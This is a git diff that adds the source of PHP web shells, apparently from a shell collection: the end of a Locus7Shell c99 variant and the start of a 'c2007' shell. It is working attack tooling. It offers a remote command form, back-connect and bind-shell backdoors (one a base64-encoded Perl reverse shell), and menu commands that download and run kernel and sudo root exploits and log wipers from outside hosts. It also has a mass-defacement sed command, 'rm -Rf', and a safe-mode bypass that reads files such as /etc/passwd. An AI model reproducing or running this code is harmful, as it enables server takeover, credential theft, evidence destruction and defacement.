+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                    <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
+                    <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
+                    <OPTION VALUE="./sudosploit">Execute Sudosploit
+                    <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
+                    <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
+                    <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
+                    <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
+                    <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
+                    <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
+                    <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^  | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?> 
\ No newline at end of file
diff --git a/138shell/C/c2007.php.txt b/138shell/C/c2007.php.txt
new file mode 100644
index 0000000..75e5725
--- /dev/null
+++ b/138shell/C/c2007.php.txt
@@ -0,0 +1,3299 @@
+<?php 
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0 pre-release build #16"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server 
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
